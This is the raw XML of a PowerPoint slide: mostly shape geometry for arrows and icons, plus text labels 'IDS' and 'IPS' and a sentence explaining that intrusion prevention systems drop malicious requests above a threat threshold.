                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957577" y="92125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957197" y="96138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961768" y="101498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965705" y="101841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2044191" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="1947926" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1944369" y="1650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941829" y="8255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943480" y="11937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946782" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007290" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951227" y="1143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194792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B216621E-CA76-D34C-68EF-7295516FF2B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="441578" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388540" y="13747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157104" y="423219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137447" y="389501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112375" y="354161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84077" y="320581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="348488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28632" y="358374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227393" y="433165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254000" y="367538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282670" y="304784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313054" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="187451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378205" y="133731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412861" y="82423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451739" y="29209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453390" y="26288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455295" y="21208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44157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A5C2FB9E-8AAF-509B-5F08-E8E1176B7D64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="436499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441578" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449833" y="3809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="14858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449325" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430873" y="57185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395301" y="107946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361489" y="160162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328914" y="215598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297648" y="274365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268120" y="335845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240399" y="399946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203073" y="502031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202056" y="504951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187578" y="512190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184530" y="512952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180975" y="513461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177165" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169545" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165607" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149225" y="512571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128609" y="486078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114460" y="466127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="456056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101004" y="446031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37385" y="367664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9905" y="338708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="333882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="319531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6096" y="306450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10159" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14477" y="300355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19303" y="298450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24002" y="296544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="295275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34035" y="294386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39116" y="293624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47117" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59308" y="296418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62356" y="298576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98583" y="337073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148002" y="406622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382835" y="19962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418766" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9144">
              <a:solidFill>
                <a:srgbClr val="243355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4C89E945-46CE-68E6-96DC-B76446612665}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5001641" y="2913506"/>
              <a:ext cx="2915285" cy="1573530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2664206" y="1473327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661539" y="1471129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657475" y="1471574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653157" y="1477048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653538" y="1481048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656332" y="1483233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706852" y="1523733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="1121854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="1134427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2704896" y="1536293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641600" y="1561617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639949" y="1565313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641346" y="1568577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642616" y="1571828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646299" y="1573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730436" y="1539748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2915158" y="27813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2904350" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819781" y="889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="1905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811907" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811018" y="8636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="12192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2878569" y="30695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="775843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="788162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881807" y="42989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="91059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="95123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838323" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842387" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844800" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915158" y="2781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BCB13B16-D2CD-EF52-8057-8009EB685803}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="447802" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478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4882F78F-1319-C414-6E5F-AB37C237CD49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6582791" y="4458665"/>
              <a:ext cx="61594" cy="88265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="61595" h="88264">
                  <a:moveTo>
                    <a:pt x="61086" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4063" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61086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951B3DB5-1AD4-100C-953C-4AC756CBEDFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="492252" y="669658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496315" y="607250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482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5D0F2F2B-FAD4-B7B4-16E0-F10B8C505EB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="69469" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469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0338635F-15DF-4DB5-B975-1D493FC342F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6652641" y="3499866"/>
              <a:ext cx="80010" cy="61594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80009" h="61595">
                  <a:moveTo>
                    <a:pt x="79501" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21208" y="6984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="61594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795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217A14CF-D6E3-C0D8-612D-B082D75704E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="352425" y="592963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="373634" y="538352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="2C2C2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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB941A0-526A-C275-5968-3DC9D1ED42C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418610" y="4319995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IDS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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B9F0B3B-3CA2-79A2-5DE8-C502CD99DBE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33233" y="4097351"/>
            <a:ext cx="551560" cy="477621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62EA5D97-D1BB-5E5C-E572-D138BC74B566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158893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0" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{233B61AC-BF95-A1A7-079F-40A528894C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158893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120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95076101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03F2D5B-C4E6-9387-6F1A-95C4C0F07CDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470229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IPS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49B9B5B-2E6B-C9EB-6B41-2CA4789436A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469620" y="1154292"/>
            <a:ext cx="77933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Intrusion</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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(IPS)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drop</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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malicious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requests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when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threat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risk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classification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above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a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>pre-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defined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threshold.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DBC8F0F4-8EC1-B072-BB63-7B41D1B4C67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="793546" y="2472805"/>
            <a:ext cx="7581113" cy="2433916"/>
            <a:chOff x="734593" y="2471927"/>
            <a:chExt cx="7581113" cy="2433916"/>
          </a:xfrm>
        </p:grpSpPr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AA52DC8C-CF29-4E57-4669-2EAD0D2E00D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4300" y="2941319"/>
